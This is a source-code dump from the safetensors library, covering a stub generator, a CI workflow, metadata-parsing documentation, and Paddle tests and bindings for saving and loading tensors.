158 | assert data == pyi_content, (
159 | f"The content of {filename} seems outdated, please run `python stub.py`"
160 | )
161 | else:
162 | with open(filename, "w") as f:
163 | f.write(pyi_content)
164 |
165 | filename = os.path.join(directory, "__init__.py")
166 | py_content = py_file(module, origin)
167 | py_content = do_black(py_content)
168 | os.makedirs(directory, exist_ok=True)
169 |
170 | is_auto = False
171 | if not os.path.exists(filename):
172 | is_auto = True
173 | else:
174 | with open(filename, "r") as f:
175 | line = f.readline()
176 | if line == GENERATED_COMMENT:
177 | is_auto = True
178 |
179 | if is_auto:
180 | if check:
181 | with open(filename, "r") as f:
182 | data = f.read()
183 | assert data == py_content, (
184 | f"The content of {filename} seems outdated, please run `python stub.py`"
185 | )
186 | else:
187 | with open(filename, "w") as f:
188 | f.write(py_content)
189 |
190 | for name, submodule in submodules:
191 | write(submodule, os.path.join(directory, name), f"{name}", check=check)
192 |
193 |
194 | if __name__ == "__main__":
195 | parser = argparse.ArgumentParser()
196 | parser.add_argument("--check", action="store_true")
197 |
198 | args = parser.parse_args()
199 | import safetensors
200 |
201 | write(
202 | safetensors._safetensors_rust,
203 | "py_src/safetensors/",
204 | "safetensors",
205 | check=args.check,
206 | )
207 |
--------------------------------------------------------------------------------
/.github/workflows/python.yml:
--------------------------------------------------------------------------------
1 | name: Python
2 |
3 | on:
4 | pull_request:
5 |
6 | jobs:
7 | build_and_test:
8 | name: Check everything builds & tests
9 | runs-on: ${{ matrix.os }}
10 | strategy:
11 | matrix:
12 | os: [ubuntu-latest, windows-latest]
13 | # Lowest and highest, no version specified so that
14 | # new releases get automatically tested against
15 | version: [{torch: torch==1.10, python: "3.9", arch: "x64", numpy: numpy==1.26.4}, {torch: torch, python: "3.12", arch: "x64", numpy: numpy}]
16 | # TODO this would include macos ARM target.
17 | # however jax has an illegal instruction issue
18 | # that exists only in CI (probably difference in instruction support).
19 | # include:
20 | # - os: macos-latest
21 | # version:
22 | # torch: torch
23 | # python: "3.11"
24 | include:
25 | - os: ubuntu-latest
26 | version:
27 | torch: torch
28 | python: "3.13"
29 | numpy: numpy
30 | arch: "x64-freethreaded"
31 | - os: macos-15-intel
32 | version:
33 | torch: torch==1.10
34 | numpy: "numpy==1.26"
35 | python: "3.9"
36 | arch: "x64"
37 | - os: macos-latest
38 | version:
39 | torch: torch
40 | python: "3.12"
41 | numpy: numpy
42 | arch: "arm64"
43 | - os: windows-11-arm
44 | version:
45 | torch: torch
46 | python: "3.12"
47 | numpy: numpy
48 | arch: "arm64"
49 | defaults:
50 | run:
51 | working-directory: ./bindings/python
52 | steps:
53 | - name: Checkout repository
54 | uses: actions/checkout@v6
55 |
56 | - name: Install Rust
57 | uses: dtolnay/rust-toolchain@stable
58 | with:
59 | components: rustfmt, clippy
60 |
61 | - name: Cargo install audit
62 | run: cargo install cargo-audit
63 |
64 | - uses: Swatinem/rust-cache@v2
65 | with:
66 | workspaces: "bindings/python"
67 |
68 | - name: Install Python
69 | uses: actions/setup-python@v6
70 | with:
71 | python-version: ${{ matrix.version.python }}
72 | architecture: ${{ matrix.version.arch }}
73 |
74 | - name: Lint with RustFmt
75 | run: cargo fmt -- --check
76 |
77 | - name: Lint with Clippy
78 | run: cargo clippy --all-targets --all-features -- -D warnings
79 |
80 | - name: Run Audit
81 | run: cargo audit -D warnings
82 |
83 | # - name: Install
84 | # run: |
85 | # pip install -U pip
86 |
87 | - name: Install (torch)
88 | if: matrix.version.arch != 'x64-freethreaded' && matrix.os != 'windows-11-arm'
89 | run: |
90 | pip install ${{ matrix.version.numpy }}
91 | pip install ${{ matrix.version.torch }}
92 | shell: bash
93 |
94 | - name: Install (torch freethreaded)
95 | if: matrix.version.arch == 'x64-freethreaded'
96 | run: |
97 | pip install ${{ matrix.version.torch }} --index-url https://download.pytorch.org/whl/cu126
98 | shell: bash
99 |
100 | - name: Install (torch windows arm64)
101 | if: matrix.os == 'windows-11-arm'
102 | run: |
103 | pip install ${{ matrix.version.numpy }}
104 | pip install ${{ matrix.version.torch }} --index-url https://download.pytorch.org/whl/cpu
105 | shell: bash
106 |
107 | - name: Install (hdf5 non windows)
108 | if: matrix.os == 'ubuntu-latest' && matrix.version.arch != 'x64-freethreaded'
109 | run: |
110 | sudo apt-get update
111 | sudo apt-get install libhdf5-dev
112 |
113 | - name: Install (tensorflow)
114 | if: matrix.version.arch != 'x64-freethreaded' && matrix.os != 'windows-11-arm'
115 | run: |
116 | pip install .[tensorflow]
117 | # Force reinstall of numpy, tensorflow uses numpy 2 even on 3.9
118 | pip install ${{ matrix.version.numpy }}
119 | shell: bash
120 |
121 | - name: Install (jax, flax)
122 | if: runner.os != 'Windows' && matrix.version.arch != 'x64-freethreaded'
123 | run:
124 | pip install .[jax]
125 | shell: bash
126 |
127 | - name: Install (mlx)
128 | if: matrix.os == 'macos-latest'
129 | run: |
130 | pip install .[mlx]
131 | shell: bash
132 |
133 | - name: Check style
134 | run: |
135 | pip install .[quality]
136 | ruff format --check .
137 |
138 | - name: Run tests
139 | if: matrix.version.arch != 'x64-freethreaded' && matrix.os != 'windows-11-arm'
140 | run: |
141 | cargo test
142 | pip install ".[testing]"
143 | pytest -sv tests/
144 |
145 | - name: Run tests (Windows arm64)
146 | if: matrix.os == 'windows-11-arm'
147 | run: |
148 | cargo test
149 | pip install ".[testing]"
150 | pytest -sv tests/ --ignore=tests/test_tf_comparison.py
151 |
152 | - name: Run tests (freethreaded)
153 | if: matrix.version.arch == 'x64-freethreaded'
154 | run: |
155 | cargo test
156 | pip install ".[testingfree]"
157 | pip install pytest numpy
158 | pytest -sv tests/test_pt*
159 | pytest -sv tests/test_simple.py
160 |
161 | test_s390x_big_endian:
162 | runs-on: ubuntu-latest
163 | permissions:
164 | contents: write
165 | packages: write
166 | name: Test bigendian - S390X
167 | steps:
168 | - uses: actions/checkout@v6
169 | - name: Set up QEMU
170 | uses: docker/setup-qemu-action@v3
171 | - name: Set up Docker Buildx
172 | uses: docker/setup-buildx-action@v3
173 | - name: Can push to GHCR?
174 | id: canpush
175 | shell: bash
176 | run: |
177 | echo "value=${{ github.event.pull_request.head.repo.fork == false }}" >> "$GITHUB_OUTPUT"
178 | - name: Docker meta
179 | id: meta
180 | uses: docker/metadata-action@v5
181 | with:
182 | # list of Docker images to use as base name for tags
183 | images: |
184 | ghcr.io/huggingface/safetensors/s390x
185 | # generate Docker tags based on the following events/attributes
186 | tags: |
187 | type=schedule
188 | type=ref,event=branch
189 | type=ref,event=pr
190 | type=semver,pattern={{version}}
191 | type=semver,pattern={{major}}.{{minor}}
192 | type=semver,pattern={{major}}
193 | type=sha
194 | - name: Login to Registry
195 | if: steps.canpush.outputs.value == 'true'
196 | uses: docker/login-action@v3
197 | with:
198 | registry: ghcr.io
199 | username: ${{ github.actor }}
200 | password: ${{ secrets.GITHUB_TOKEN }}
201 | - name: Test big endian
202 | uses: docker/build-push-action@v6
203 | with:
204 | platforms: linux/s390x
205 | file: Dockerfile.s390x.test
206 | tags: ${{ steps.meta.outputs.tags }}
207 | labels: ${{ steps.meta.outputs.labels }}
208 | cache-from: ${{ steps.canpush.outputs.value == 'true' && 'type=registry,ref=ghcr.io/huggingface/safetensors/s390x:cache,mode=max' || 'type=gha' }}
209 | cache-to: ${{ steps.canpush.outputs.value == 'true' && 'type=registry,ref=ghcr.io/huggingface/safetensors/s390x:cache,mode=max' || 'type=gha' }}
210 | push: ${{ steps.canpush.outputs.value == 'true' }}
211 |
--------------------------------------------------------------------------------
/docs/source/metadata_parsing.mdx:
--------------------------------------------------------------------------------
1 | # Metadata Parsing
2 |
3 | Given the simplicity of the format, it's very simple and efficient to fetch and parse metadata about Safetensors weights – i.e. the list of tensors, their types, and their shapes or numbers of parameters – using small [(Range) HTTP requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/Range_requests).
4 |
5 | This parsing has been implemented in JS in [`huggingface.js`](https://huggingface.co/docs/huggingface.js/main/en/hub/modules#parsesafetensorsmetadata) (sample code follows below), but it would be similar in any language.
6 |
7 | ## Example use case
8 |
9 | There can be many potential use cases. For instance, we use it on the HuggingFace Hub to display info about models which have safetensors weights:
10 |
21 | ## Usage
22 |
23 |
24 |
25 |
26 | From the [🤗 Hub](https://hf.co/models), you can get the metadata of a model with [HTTP range requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/Range_requests) instead of downloading the entire safetensors file with all the weights. In the example Python script below (you can use any language that supports HTTP requests), we parse the metadata of [gpt2](https://huggingface.co/gpt2/blob/main/model.safetensors).
27 |
28 | ```python
29 | import requests # pip install requests
30 | import struct
31 |
32 | def parse_single_file(url):
33 |     # Fetch the first 8 bytes of the file
34 |     headers = {'Range': 'bytes=0-7'}
35 |     response = requests.get(url, headers=headers)
36 |     # Interpret the bytes as a little-endian unsigned 64-bit integer
37 |     length_of_header = struct.unpack('<Q', response.content)[0]
38 |     # Fetch length_of_header bytes starting from the 9th byte
39 |     headers = {'Range': f'bytes=8-{7 + length_of_header}'}
40 |     response = requests.get(url, headers=headers)
41 |     # Interpret the response as a JSON object
42 |     header = response.json()
43 |     return header
44 | 
45 | url = "https://huggingface.co/gpt2/resolve/main/model.safetensors"
46 | header = parse_single_file(url)
47 | 
48 | print(header)
49 | # {
50 | #   "__metadata__": { "format": "pt" },
51 | #   "h.10.ln_1.weight": {
52 | #     "dtype": "F32",
53 | #     "shape": [768],
54 | #     "data_offsets": [223154176, 223157248]
55 | #   },
56 | #   ...
57 | # }
58 | ```
59 | 
60 |
61 |
62 | Using [`huggingface.js`](https://huggingface.co/docs/huggingface.js)
63 |
64 | ```ts
65 | import { parseSafetensorsMetadata } from "@huggingface/hub";
66 |
67 | const info = await parseSafetensorsMetadata({
68 | repo: { type: "model", name: "bigscience/bloom" },
69 | });
70 |
71 | console.log(info)
72 | // {
73 | // sharded: true,
74 | // index: {
75 | // metadata: { total_size: 352494542848 },
76 | // weight_map: {
77 | // 'h.0.input_layernorm.bias': 'model_00002-of-00072.safetensors',
78 | // ...
79 | // }
80 | // },
81 | // headers: {
82 | // __metadata__: {'format': 'pt'},
83 | // 'h.2.attn.c_attn.weight': {'dtype': 'F32', 'shape': [768, 2304], 'data_offsets': [541012992, 548090880]},
84 | // ...
85 | // }
86 | // }
87 | ```
88 |
89 | Depending on whether the safetensors weights are sharded into multiple files or not, the output of the call above will be:
90 |
91 | ```ts
92 | export type SafetensorsParseFromRepo =
93 | | {
94 | sharded: false;
95 | header: SafetensorsFileHeader;
96 | }
97 | | {
98 | sharded: true;
99 | index: SafetensorsIndexJson;
100 | headers: SafetensorsShardedHeaders;
101 | };
102 | ```
103 |
104 | where the underlying `types` are the following:
105 |
106 | ```ts
107 | type FileName = string;
108 |
109 | type TensorName = string;
110 | type Dtype = "F64" | "F32" | "F16" | "BF16" | "I64" | "I32" | "I16" | "I8" | "U8" | "BOOL";
111 |
112 | interface TensorInfo {
113 | dtype: Dtype;
114 | shape: number[];
115 | data_offsets: [number, number];
116 | }
117 |
118 | type SafetensorsFileHeader = Record<TensorName, TensorInfo> & {
119 |   __metadata__: Record<string, string>;
120 | };
121 |
122 | interface SafetensorsIndexJson {
123 |   weight_map: Record<TensorName, FileName>;
124 | }
125 |
126 | export type SafetensorsShardedHeaders = Record<FileName, SafetensorsFileHeader>;
127 | ```
128 |
129 |
130 |
131 | [`huggingface_hub`](https://huggingface.co/docs/huggingface_hub) provides a Python API to parse safetensors metadata.
132 | Use [`get_safetensors_metadata`](https://huggingface.co/docs/huggingface_hub/package_reference/hf_api#huggingface_hub.HfApi.get_safetensors_metadata) to get all safetensors metadata of a model.
133 | Depending on whether the model is sharded or not, one or multiple safetensors files will be parsed.
134 |
135 | ```python
136 | >>> from huggingface_hub import get_safetensors_metadata
137 |
138 | # Parse repo with single weights file
139 | >>> metadata = get_safetensors_metadata("bigscience/bloomz-560m")
140 | >>> metadata
141 | SafetensorsRepoMetadata(
142 | metadata=None,
143 | sharded=False,
144 | weight_map={'h.0.input_layernorm.bias': 'model.safetensors', ...},
145 | files_metadata={'model.safetensors': SafetensorsFileMetadata(...)}
146 | )
147 | >>> metadata.files_metadata["model.safetensors"].metadata
148 | {'format': 'pt'}
149 |
150 | # Parse repo with sharded model (i.e. multiple weights files)
151 | >>> metadata = get_safetensors_metadata("bigscience/bloom")
152 | Parse safetensors files: 100%|██████████████████████████████████████████| 72/72 [00:12<00:00, 5.78it/s]
153 | >>> metadata
154 | SafetensorsRepoMetadata(metadata={'total_size': 352494542848}, sharded=True, weight_map={...}, files_metadata={...})
155 | >>> len(metadata.files_metadata)
156 | 72 # All safetensors files have been fetched
157 |
158 | # Parse repo that is not a safetensors repo
159 | >>> get_safetensors_metadata("runwayml/stable-diffusion-v1-5")
160 | NotASafetensorsRepoError: 'runwayml/stable-diffusion-v1-5' is not a safetensors repo. Couldn't find 'model.safetensors.index.json' or 'model.safetensors' files.
161 | ```
162 |
163 | To parse the metadata of a single safetensors file, use [`parse_safetensors_file_metadata`](https://huggingface.co/docs/huggingface_hub/package_reference/hf_api#huggingface_hub.HfApi.parse_safetensors_file_metadata).
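A short usage sketch in the same REPL style (the exact output is illustrative; fields such as `metadata` and `parameter_count` follow the documented `SafetensorsFileMetadata` type):

```python
>>> from huggingface_hub import parse_safetensors_file_metadata

>>> info = parse_safetensors_file_metadata("gpt2", "model.safetensors")
>>> info.metadata
{'format': 'pt'}
>>> info.parameter_count
{'F32': 137022720}
```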
164 |
165 |
166 |
167 |
168 | ## Example output
169 |
170 | For instance, here are the number of params per dtype for a few models on the HuggingFace Hub. Also see [this issue](https://github.com/huggingface/safetensors/issues/44) for more examples of usage.
171 |
172 | model | safetensors | params
173 | --- | --- | ---
174 | [gpt2](https://huggingface.co/gpt2?show_tensors=true) | single-file | { 'F32' => 137022720 }
175 | [roberta-base](https://huggingface.co/roberta-base?show_tensors=true) | single-file | { 'F32' => 124697433, 'I64' => 514 }
176 | [Jean-Baptiste/camembert-ner](https://huggingface.co/Jean-Baptiste/camembert-ner?show_tensors=true) | single-file | { 'F32' => 110035205, 'I64' => 514 }
177 | [roberta-large](https://huggingface.co/roberta-large?show_tensors=true) | single-file | { 'F32' => 355412057, 'I64' => 514 }
178 | [distilbert-base-german-cased](https://huggingface.co/distilbert-base-german-cased?show_tensors=true) | single-file | { 'F32' => 67431550 }
179 | [EleutherAI/gpt-neox-20b](https://huggingface.co/EleutherAI/gpt-neox-20b?show_tensors=true) | sharded | { 'F16' => 20554568208, 'U8' => 184549376 }
180 | [bigscience/bloom-560m](https://huggingface.co/bigscience/bloom-560m?show_tensors=true) | single-file | { 'F16' => 559214592 }
181 | [bigscience/bloom](https://huggingface.co/bigscience/bloom?show_tensors=true) | sharded | { 'BF16' => 176247271424 }
182 | [bigscience/bloom-3b](https://huggingface.co/bigscience/bloom-3b?show_tensors=true) | single-file | { 'F16' => 3002557440 }
183 |
--------------------------------------------------------------------------------
/bindings/python/tests/test_paddle_comparison.py:
--------------------------------------------------------------------------------
1 | import unittest
2 | import numpy as np
3 |
4 | from safetensors import safe_open
5 |
6 |
7 | try:
8 | import paddle
9 | from safetensors.paddle import load_file, save_file, save, load
10 |
11 | HAS_PADDLE = True
12 | except ImportError:
13 | HAS_PADDLE = False
14 |
15 |
16 | @unittest.skipIf(not HAS_PADDLE, "Paddle is not available")
17 | class SafeTestCase(unittest.TestCase):
18 | def setUp(self):
19 | data = {
20 | "test": paddle.zeros((1024, 1024), dtype=paddle.float32),
21 | "test2": paddle.zeros((1024, 1024), dtype=paddle.float32),
22 | "test3": paddle.zeros((1024, 1024), dtype=paddle.float32),
23 | "test4": paddle.zeros((1024, 1024), dtype=paddle.complex64),
24 | }
25 | self.paddle_filename = "./tests/data/paddle_load.pdparams"
26 | self.sf_filename = "./tests/data/paddle_load.safetensors"
27 |
28 | paddle.save(data, self.paddle_filename)
29 | save_file(data, self.sf_filename)
30 |
31 | @unittest.expectedFailure
32 | def test_zero_sized(self):
33 |         # This fails because paddle wants an initialized tensor
34 |         # before sending it to numpy
35 | data = {
36 | "test": paddle.zeros((2, 0), dtype=paddle.float32),
37 | }
38 | local = "./tests/data/out_safe_paddle_mmap_small2.safetensors"
39 | save_file(data, local)
40 | reloaded = load_file(local)
41 | self.assertTrue(paddle.equal(data["test"], reloaded["test"]))
42 |
43 | def test_deserialization_safe(self):
44 | weights = load_file(self.sf_filename)
45 |
46 | paddle_weights = paddle.load(self.paddle_filename)
47 | for k, v in weights.items():
48 | tv = paddle_weights[k]
49 | self.assertTrue(np.allclose(v, tv))
50 |
51 |
52 | @unittest.skipIf(not HAS_PADDLE, "Paddle is not available")
53 | class WithOpenCase(unittest.TestCase):
54 | def test_paddle_tensor_cpu(self):
55 | A = paddle.randn((10, 5))
56 | tensors = {
57 | "a": A,
58 | }
59 | save_file(tensors, "./tensor_paddle.safetensors")
60 |
61 | # Now loading cpu
62 | with safe_open(
63 | "./tensor_paddle.safetensors", framework="paddle", device="cpu"
64 | ) as f:
65 | tensor = f.get_tensor("a")
66 | self.assertEqual(list(tensor.shape), [10, 5])
67 | assert paddle.allclose(tensor, A).item()
68 | assert not tensor.place.is_gpu_place()
69 |
70 | def test_paddle_tensor_gpu(self):
71 | A = paddle.randn((10, 5))
72 | tensors = {
73 | "a": A,
74 | }
75 | save_file(tensors, "./tensor_paddle.safetensors")
76 | # Now loading gpu
77 | with safe_open(
78 | "./tensor_paddle.safetensors", framework="paddle", device="cuda"
79 | ) as f:
80 | tensor = f.get_tensor("a")
81 | self.assertEqual(list(tensor.shape), [10, 5])
82 | assert paddle.allclose(tensor, A).item()
83 | assert tensor.place.is_gpu_place()
84 |
85 | def test_paddle_slice_cpu(self):
86 | A = paddle.randn((10, 5))
87 | tensors = {
88 | "a": A,
89 | }
90 | save_file(tensors, "./slice_paddle.safetensors")
91 |
92 | # Now loading
93 | with safe_open(
94 | "./slice_paddle.safetensors", framework="paddle", device="cpu"
95 | ) as f:
96 | slice_ = f.get_slice("a")
97 | tensor = slice_[:]
98 | self.assertEqual(list(tensor.shape), [10, 5])
99 | assert paddle.allclose(tensor, A).item()
100 | assert not tensor.place.is_gpu_place()
101 |
102 | tensor = slice_[tuple()]
103 | self.assertEqual(list(tensor.shape), [10, 5])
104 | assert paddle.allclose(tensor, A).item()
105 | assert not tensor.place.is_gpu_place()
106 |
107 | tensor = slice_[:2]
108 | self.assertEqual(list(tensor.shape), [2, 5])
109 | assert paddle.allclose(tensor, A[:2]).item()
110 | assert not tensor.place.is_gpu_place()
111 |
112 | tensor = slice_[:, :2]
113 | self.assertEqual(list(tensor.shape), [10, 2])
114 | assert paddle.allclose(tensor, A[:, :2]).item()
115 | assert not tensor.place.is_gpu_place()
116 |
117 | tensor = slice_[0, :2]
118 | self.assertEqual(list(tensor.shape), [2])
119 | assert paddle.allclose(tensor, A[0, :2]).item()
120 | assert not tensor.place.is_gpu_place()
121 |
122 | tensor = slice_[2:, 0]
123 | self.assertEqual(list(tensor.shape), [8])
124 | assert paddle.allclose(tensor, A[2:, 0]).item()
125 | assert not tensor.place.is_gpu_place()
126 |
127 | tensor = slice_[2:, 1]
128 | self.assertEqual(list(tensor.shape), [8])
129 | assert paddle.allclose(tensor, A[2:, 1]).item()
130 | assert not tensor.place.is_gpu_place()
131 |
132 | tensor = slice_[2:, -1]
133 | self.assertEqual(list(tensor.shape), [8])
134 | assert paddle.allclose(tensor, A[2:, -1]).item()
135 | assert not tensor.place.is_gpu_place()
136 |
137 | tensor = slice_[list()]
138 | self.assertEqual(list(tensor.shape), [0, 5])
139 | assert paddle.allclose(tensor, A[list()]).item()
140 | assert not tensor.place.is_gpu_place()
141 |
142 | def test_paddle_slice_gpu(self):
143 | A = paddle.randn((10, 5))
144 | tensors = {
145 | "a": A,
146 | }
147 | save_file(tensors, "./slice_paddle.safetensors")
148 |
149 | # Now loading
150 | with safe_open(
151 | "./slice_paddle.safetensors", framework="paddle", device="cuda"
152 | ) as f:
153 | slice_ = f.get_slice("a")
154 | tensor = slice_[:]
155 | self.assertEqual(list(tensor.shape), [10, 5])
156 | assert paddle.allclose(tensor, A).item()
157 | assert tensor.place.is_gpu_place()
158 |
159 | tensor = slice_[tuple()]
160 | self.assertEqual(list(tensor.shape), [10, 5])
161 | assert paddle.allclose(tensor, A).item()
162 | assert tensor.place.is_gpu_place()
163 |
164 | tensor = slice_[:2]
165 | self.assertEqual(list(tensor.shape), [2, 5])
166 | assert paddle.allclose(tensor, A[:2]).item()
167 | assert tensor.place.is_gpu_place()
168 |
169 | tensor = slice_[:, :2]
170 | self.assertEqual(list(tensor.shape), [10, 2])
171 | assert paddle.allclose(tensor, A[:, :2]).item()
172 | assert tensor.place.is_gpu_place()
173 |
174 | tensor = slice_[0, :2]
175 | self.assertEqual(list(tensor.shape), [2])
176 | assert paddle.allclose(tensor, A[0, :2]).item()
177 | assert tensor.place.is_gpu_place()
178 |
179 | tensor = slice_[2:, 0]
180 | self.assertEqual(list(tensor.shape), [8])
181 | assert paddle.allclose(tensor, A[2:, 0]).item()
182 | assert tensor.place.is_gpu_place()
183 |
184 | tensor = slice_[2:, 1]
185 | self.assertEqual(list(tensor.shape), [8])
186 | assert paddle.allclose(tensor, A[2:, 1]).item()
187 | assert tensor.place.is_gpu_place()
188 |
189 | tensor = slice_[2:, -1]
190 | self.assertEqual(list(tensor.shape), [8])
191 | assert paddle.allclose(tensor, A[2:, -1]).item()
192 | assert tensor.place.is_gpu_place()
193 |
194 | tensor = slice_[list()]
195 | self.assertEqual(list(tensor.shape), [0, 5])
196 | assert paddle.allclose(tensor, A[list()]).item()
197 | assert tensor.place.is_gpu_place()
198 |
199 |
200 | @unittest.skipIf(not HAS_PADDLE, "Paddle is not available")
201 | class SaveLoadCase(unittest.TestCase):
202 | def test_in_memory(self):
203 | data = {
204 | "test": paddle.zeros((2, 2), dtype=paddle.float32),
205 | }
206 | binary = save(data)
207 | self.assertEqual(
208 | binary,
209 | # Spaces are for forcing the alignment.
210 | b'@\x00\x00\x00\x00\x00\x00\x00{"test":{"dtype":"F32","shape":[2,2],"data_offsets":[0,16]}} '
211 | b" \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
212 | )
213 | reloaded = load(binary)
214 | out = paddle.equal(data["test"], reloaded["test"])
215 | self.assertTrue(paddle.all(out))
216 |
217 | def test_save_load_cpu(self):
218 | if paddle.__version__ >= "3.2.0":
219 | self.dtype = paddle.bfloat16
220 | else:
221 | self.dtype = paddle.float32
222 | data = {
223 | "test": paddle.randn((2, 2), dtype=self.dtype),
224 | }
225 | self.sf_filename = "./tests/data/paddle_save_load_cpu.safetensors"
226 | save_file(data, self.sf_filename)
227 | reloaded = load(open(self.sf_filename, "rb").read())
228 | out = paddle.equal(data["test"], reloaded["test"])
229 | self.assertTrue(paddle.all(out))
230 |
231 | def test_odd_dtype(self):
232 | if paddle.__version__ >= "3.2.0":
233 | data = {
234 | "test1": paddle.randn((2, 2), dtype=paddle.bfloat16),
235 | "test2": paddle.randn((2, 2), dtype=paddle.float32),
236 | }
237 | self.sf_filename = "./tests/data/paddle_save_load_type.safetensors"
238 | save_file(data, self.sf_filename)
239 | reloaded = load_file(self.sf_filename)
240 | self.assertTrue(paddle.all(paddle.equal(data["test1"], reloaded["test1"])))
241 | self.assertEqual(reloaded["test1"].dtype, paddle.bfloat16)
242 | self.assertTrue(paddle.all(paddle.equal(data["test2"], reloaded["test2"])))
243 | self.assertEqual(reloaded["test2"].dtype, paddle.float32)
244 |
--------------------------------------------------------------------------------
/bindings/python/py_src/safetensors/paddle.py:
--------------------------------------------------------------------------------
1 | import os
2 | import sys
3 | from typing import Any, Dict, List, Optional, Union
4 |
5 | import numpy as np
6 | import paddle
7 |
8 | from safetensors import numpy, deserialize, safe_open, serialize, serialize_file
9 |
10 |
11 | def save(
12 | tensors: Dict[str, paddle.Tensor], metadata: Optional[Dict[str, str]] = None
13 | ) -> bytes:
14 | """
15 | Saves a dictionary of tensors into raw bytes in safetensors format.
16 |
17 | Args:
18 | tensors (`Dict[str, paddle.Tensor]`):
19 | The incoming tensors. Tensors need to be contiguous and dense.
20 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
21 | Optional text only metadata you might want to save in your header.
22 | For instance it can be useful to specify more about the underlying
23 | tensors. This is purely informative and does not affect tensor loading.
24 |
25 | Returns:
26 | `bytes`: The raw bytes representing the format
27 |
28 | Example:
29 |
30 | ```python
31 | from safetensors.paddle import save
32 | import paddle
33 |
34 | tensors = {"embedding": paddle.zeros((512, 1024)), "attention": paddle.zeros((256, 256))}
35 | byte_data = save(tensors)
36 | ```
37 | """
38 |     keep_references_alive = []  # holds (ndarray view, tensor) pairs so the raw pointers stay valid during serialization
39 | serialized = serialize(_flatten(tensors, keep_references_alive), metadata=metadata)
40 | result = bytes(serialized)
41 | return result
42 |
43 |
44 | def save_file(
45 | tensors: Dict[str, paddle.Tensor],
46 | filename: Union[str, os.PathLike],
47 | metadata: Optional[Dict[str, str]] = None,
48 | ) -> None:
49 | """
50 |     Saves a dictionary of tensors into a file in safetensors format.
51 |
52 | Args:
53 | tensors (`Dict[str, paddle.Tensor]`):
54 | The incoming tensors. Tensors need to be contiguous and dense.
55 |         filename (`str`, or `os.PathLike`):
56 | The filename we're saving into.
57 | metadata (`Dict[str, str]`, *optional*, defaults to `None`):
58 | Optional text only metadata you might want to save in your header.
59 | For instance it can be useful to specify more about the underlying
60 | tensors. This is purely informative and does not affect tensor loading.
61 |
62 | Returns:
63 | `None`
64 |
65 | Example:
66 |
67 | ```python
68 | from safetensors.paddle import save_file
69 | import paddle
70 |
71 | tensors = {"embedding": paddle.zeros((512, 1024)), "attention": paddle.zeros((256, 256))}
72 | save_file(tensors, "model.safetensors")
73 | ```
74 | """
75 |     keep_references_alive = []  # keeps ndarray views / CPU copies alive until serialize_file has consumed the pointers
76 | serialize_file(
77 | _flatten(tensors, keep_references_alive), filename, metadata=metadata
78 | )
79 |
80 |
81 | def load(data: bytes, device: str = "cpu") -> Dict[str, paddle.Tensor]:
82 | """
83 | Loads a safetensors file into paddle format from pure bytes.
84 |
85 |     Args:
86 |         data (`bytes`):
87 |             The content of a safetensors file
88 |         device (`str`, *optional*, defaults to `"cpu"`):
89 |             The device where the tensors need to be located after load.
90 |
91 |     Returns:
92 |         `Dict[str, paddle.Tensor]`: dictionary that contains name as key, value as `paddle.Tensor` on the requested device
91 |
92 | Example:
93 |
94 | ```python
95 | from safetensors.paddle import load
96 |
97 | file_path = "./my_folder/bert.safetensors"
98 | with open(file_path, "rb") as f:
99 | data = f.read()
100 |
101 | loaded = load(data)
102 | ```
103 | """
104 |     if paddle.__version__ >= "3.2.0":  # NOTE: string comparison; would misorder e.g. "3.10.0" < "3.2.0"
105 | flat = deserialize(data)
106 | return _view2paddle(flat, device)
107 | else:
108 | flat = numpy.load(data)
109 | return _np2paddle(flat, device)
110 |
111 |
112 | def load_file(
113 | filename: Union[str, os.PathLike], device="cpu"
114 | ) -> Dict[str, paddle.Tensor]:
115 | """
116 | Loads a safetensors file into paddle format.
117 |
118 | Args:
119 |         filename (`str`, or `os.PathLike`):
120 |             The name of the file which contains the tensors
121 |         device (`str`, *optional*, defaults to `"cpu"`):
122 |             The device where the tensors need to be located after load.
123 |             Available options are all regular paddle device locations.
124 |
125 | Returns:
126 | `Dict[str, paddle.Tensor]`: dictionary that contains name as key, value as `paddle.Tensor`
127 |
128 | Example:
129 |
130 | ```python
131 | from safetensors.paddle import load_file
132 |
133 | file_path = "./my_folder/bert.safetensors"
134 | loaded = load_file(file_path)
135 | ```
136 | """
137 | result = {}
138 |     if paddle.__version__ >= "3.2.0":  # NOTE: string version comparison (see `load`)
139 | with safe_open(filename, framework="paddle", device=device) as f:
140 | for k in f.offset_keys():
141 | result[k] = f.get_tensor(k)
142 | else:
143 | flat = numpy.load_file(filename)
144 | result = _np2paddle(flat, device)
145 | return result
146 |
147 |
148 | def _np2paddle(
149 | numpy_dict: Dict[str, np.ndarray], device: str = "cpu"
150 | ) -> Dict[str, paddle.Tensor]:
151 | for k, v in numpy_dict.items():
152 | numpy_dict[k] = paddle.to_tensor(v, place=device)
153 | return numpy_dict
154 |
155 |
156 | def _paddle2np(paddle_dict: Dict[str, paddle.Tensor]) -> Dict[str, np.ndarray]:
157 | for k, v in paddle_dict.items():
158 | paddle_dict[k] = v.detach().cpu().numpy()
159 | return paddle_dict
160 |
161 |
162 | _SIZE = {
163 | paddle.int64: 8,
164 | paddle.float32: 4,
165 | paddle.int32: 4,
166 | paddle.bfloat16: 2,
167 | paddle.float16: 2,
168 | paddle.int16: 2,
169 | paddle.uint8: 1,
170 | paddle.int8: 1,
171 | paddle.bool: 1,
172 | paddle.float64: 8,
173 | paddle.float8_e4m3fn: 1,
174 | paddle.float8_e5m2: 1,
175 | paddle.complex64: 8,
176 | # XXX: These are not supported yet in paddle
177 | # paddle.uint64: 8,
178 | # paddle.uint32: 4,
179 | # paddle.uint16: 2,
180 | # paddle.float8_e8m0: 1,
181 | # paddle.float4_e2m1_x2: 1,
182 | }
183 |
184 | _TYPES = {
185 | "F64": paddle.float64,
186 | "F32": paddle.float32,
187 | "F16": paddle.float16,
188 | "BF16": paddle.bfloat16,
189 | "I64": paddle.int64,
190 | "I32": paddle.int32,
191 | "I16": paddle.int16,
192 | "I8": paddle.int8,
193 | "U8": paddle.uint8,
194 | "BOOL": paddle.bool,
195 | "F8_E4M3": paddle.float8_e4m3fn,
196 | "F8_E5M2": paddle.float8_e5m2,
197 | }
198 |
199 | NPDTYPES = {
200 | paddle.int64: np.int64,
201 | paddle.float32: np.float32,
202 | paddle.int32: np.int32,
203 | # XXX: This is ok because both have the same width
204 | paddle.bfloat16: np.float16,
205 | paddle.float16: np.float16,
